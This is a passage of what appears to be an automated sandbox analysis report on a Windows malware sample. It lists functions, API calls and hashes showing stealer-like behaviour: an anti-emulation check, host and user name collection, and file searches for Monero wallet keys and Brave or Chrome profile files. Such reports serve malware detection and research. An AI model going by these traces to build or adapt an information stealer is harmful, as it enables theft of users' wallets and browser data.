                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                        • String ID: ERROR$ERROR
                                        • API String ID: 3287882509-2579291623
                                        • Opcode ID: 629209f17229214b3c379e80a77601af8535a9236ee0b4780b5d120796ca2063
                                        • Instruction ID: 2facb571303a0009cefb9ed47e2a051c374560baba731545e8c7635dcc9c16ff
                                        • Opcode Fuzzy Hash: 629209f17229214b3c379e80a77601af8535a9236ee0b4780b5d120796ca2063
                                        • Instruction Fuzzy Hash: A8115231900118ABCB14FF70ED52BED737DAF90300F404558F91A5B1A6EF34AB09CA95
                                        Function 00911110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0091112B
                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00911132
                                        • ExitProcess.KERNEL32 ref: 00911143
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                        • String ID:
                                        • API String ID: 1103761159-0
                                        • Opcode ID: 4de000d143ba33628fbc1d2b64d24baf5661c2303e15fb989b9db8129a43d1cf
                                        • Instruction ID: 2337623b8ded51157699efb65a8e31ed59ec45292632909cc8150050a3d08c25
                                        • Opcode Fuzzy Hash: 4de000d143ba33628fbc1d2b64d24baf5661c2303e15fb989b9db8129a43d1cf
                                        • Instruction Fuzzy Hash: DAE0E670A4534CFBE710ABA09C0AB497A78AB04B12F104194F709775D0DAB52A409699
                                        Function 009110A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009110B3
                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009110F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree
                                        • String ID:
                                        • API String ID: 2087232378-0
                                        • Opcode ID: 26169b163b5056946248bfdb311e31f23fcffdf7af01ca092cdb2cee8e0e5d27
                                        • Instruction ID: 9bea2697903472f2613cbef14641007c939b3d9e925afcc9658e8b2384c61c32
                                        • Opcode Fuzzy Hash: 26169b163b5056946248bfdb311e31f23fcffdf7af01ca092cdb2cee8e0e5d27
                                        • Instruction Fuzzy Hash: 19F0E271A41318BBE7149AA4AC59FAFB7ECE709B15F300988F604E3280D9719E40CAA0
                                        Function 00911190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 009278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927910
                                          • Part of subcall function 009278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00927917
                                          • Part of subcall function 009278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0092792F
                                          • Part of subcall function 00927850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009111B7), ref: 00927880
                                          • Part of subcall function 00927850: RtlAllocateHeap.NTDLL(00000000), ref: 00927887
                                          • Part of subcall function 00927850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0092789F
                                        • ExitProcess.KERNEL32 ref: 009111C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                                        • String ID:
                                        • API String ID: 3550813701-0
                                        • Opcode ID: 67498fee6314f4163471b1b7f2bfbb0aa1b5c86308d679414d2ef61ca7b39fb7
                                        • Instruction ID: 76662ba0645585471d80407e0367c7eab48268999fc079d928f6c79ef4e4af51
                                        • Opcode Fuzzy Hash: 67498fee6314f4163471b1b7f2bfbb0aa1b5c86308d679414d2ef61ca7b39fb7
                                        • Instruction Fuzzy Hash: 7FE017B5E1831563CA0073F0BC8BB2B769C5B9434AF040968FA09E3206FE25E800866A

                                        Non-executed Functions

                                        Function 009238B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 009238CC
                                        • FindFirstFileA.KERNEL32(?,?), ref: 009238E3
                                        • lstrcat.KERNEL32(?,?), ref: 00923935
                                        • StrCmpCA.SHLWAPI(?,00930F70), ref: 00923947
                                        • StrCmpCA.SHLWAPI(?,00930F74), ref: 0092395D
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00923C67
                                        • FindClose.KERNEL32(000000FF), ref: 00923C7C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                        • API String ID: 1125553467-2524465048
                                        • Opcode ID: 1d515db515a7bcd3cfc749b8a5f9027f8fecf62466b91702808d048afe4bc61c
                                        • Instruction ID: 4b864ea7f1702756f7f2e293ba68d620f14d661fbca05505186f1f56e0c6a62c
                                        • Opcode Fuzzy Hash: 1d515db515a7bcd3cfc749b8a5f9027f8fecf62466b91702808d048afe4bc61c
                                        • Instruction Fuzzy Hash: 9BA121B1A003189BDB24DF64DC85FEE737DBB88301F048698A64DA7145EB759B84CF62
                                        Function 0091BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00930B32,00930B2B,00000000,?,?,?,009313F4,00930B2A), ref: 0091BEF5
                                        • StrCmpCA.SHLWAPI(?,009313F8), ref: 0091BF4D
                                        • StrCmpCA.SHLWAPI(?,009313FC), ref: 0091BF63
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0091C7BF
                                        • FindClose.KERNEL32(000000FF), ref: 0091C7D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                        • API String ID: 3334442632-726946144
                                        • Opcode ID: 28e380b7bd50053589896b4e4e0bf36b3e4fbdc9c3124a251a88c4a7955e4c46
                                        • Instruction ID: 9529a517fb7514f4852e30b769f26bf1bef15e88a53b73eaa15345b6462fe061
                                        • Opcode Fuzzy Hash: 28e380b7bd50053589896b4e4e0bf36b3e4fbdc9c3124a251a88c4a7955e4c46
                                        • Instruction Fuzzy Hash: 58424272A10118ABCB14FB60EC96FED737DAFD8300F404558F50AA7195EE349B49CB96
                                        Function 00924910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 0092492C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00924943
                                        • StrCmpCA.SHLWAPI(?,00930FDC), ref: 00924971
                                        • StrCmpCA.SHLWAPI(?,00930FE0), ref: 00924987
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00924B7D
                                        • FindClose.KERNEL32(000000FF), ref: 00924B92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s$%s\%s$%s\*
                                        • API String ID: 180737720-445461498
                                        • Opcode ID: 95dfc1c80d163005b443f1450b06d93dbbf193f2d012b5cc399c11bf1510edd6
                                        • Instruction ID: d90b965799f7d59c1564475fbe87061bf34d4e2fa39d2c6a14e9702d85a60763
                                        • Opcode Fuzzy Hash: 95dfc1c80d163005b443f1450b06d93dbbf193f2d012b5cc399c11bf1510edd6
                                        • Instruction Fuzzy Hash: 93612771500218ABCB24EBA0EC55FEE777CBB88701F0446D8B609A6145EF75EB85CF91
                                        Function 00924570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00924580
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00924587
                                        • wsprintfA.USER32 ref: 009245A6
                                        • FindFirstFileA.KERNEL32(?,?), ref: 009245BD
                                        • StrCmpCA.SHLWAPI(?,00930FC4), ref: 009245EB
                                        • StrCmpCA.SHLWAPI(?,00930FC8), ref: 00924601
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0092468B
                                        • FindClose.KERNEL32(000000FF), ref: 009246A0
                                        • lstrcat.KERNEL32(?,006BEAD8), ref: 009246C5
                                        • lstrcat.KERNEL32(?,006BDCA0), ref: 009246D8
                                        • lstrlen.KERNEL32(?), ref: 009246E5
                                        • lstrlen.KERNEL32(?), ref: 009246F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 671575355-2848263008
                                        • Opcode ID: 9711be7e02bba9ee5e8ba54a389329f89d899907eb8406bf8277f68ef8c0a332
                                        • Instruction ID: bab89844420c2c48b9097e782125e2adf17d65bb39f232b0782ab0cb14f524ae
                                        • Opcode Fuzzy Hash: 9711be7e02bba9ee5e8ba54a389329f89d899907eb8406bf8277f68ef8c0a332
                                        • Instruction Fuzzy Hash: 215145B5500218ABC764EB70DC89FED737CAB98701F4046C8F609A7194EF759B848F92
                                        Function 00923EA0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 133fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 00923EC3
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00923EDA
                                        • StrCmpCA.SHLWAPI(?,00930FAC), ref: 00923F08
                                        • StrCmpCA.SHLWAPI(?,00930FB0), ref: 00923F1E
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0092406C
                                        • FindClose.KERNEL32(000000FF), ref: 00924081
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s$hk
                                        • API String ID: 180737720-2267562958
                                        • Opcode ID: 5adc2499788fa965fc28ffd11a8cf09808c88efe04a04f8510e059514d4058f5
                                        • Instruction ID: ee108d88a1ae6b44f1647c096388b9f9723aa9c38258b81054f953efd39fb677
                                        • Opcode Fuzzy Hash: 5adc2499788fa965fc28ffd11a8cf09808c88efe04a04f8510e059514d4058f5
                                        • Instruction Fuzzy Hash: FB5127B6900218ABCB24EBB0DC85FEE777CBB84301F4046C8B65997144DF75AB858F55
                                        Function 0091ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 0091ED3E
                                        • FindFirstFileA.KERNEL32(?,?), ref: 0091ED55
                                        • StrCmpCA.SHLWAPI(?,00931538), ref: 0091EDAB
                                        • StrCmpCA.SHLWAPI(?,0093153C), ref: 0091EDC1
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0091F2AE
                                        • FindClose.KERNEL32(000000FF), ref: 0091F2C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\*.*
                                        • API String ID: 180737720-1013718255
                                        • Opcode ID: 284cc798b022ac84678393e351e313011fbcce6aedfe17be79cae5ea62913839
                                        • Instruction ID: 8248ea1231aed4d6196efab5492bfeade24a13947649b7e75253572a90e47509
                                        • Opcode Fuzzy Hash: 284cc798b022ac84678393e351e313011fbcce6aedfe17be79cae5ea62913839
                                        • Instruction Fuzzy Hash: CBE1AD769111289BEB55FB60EC52FEE733CAF94300F404599F50A62096EE306F8ACF56
                                        Function 0091F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
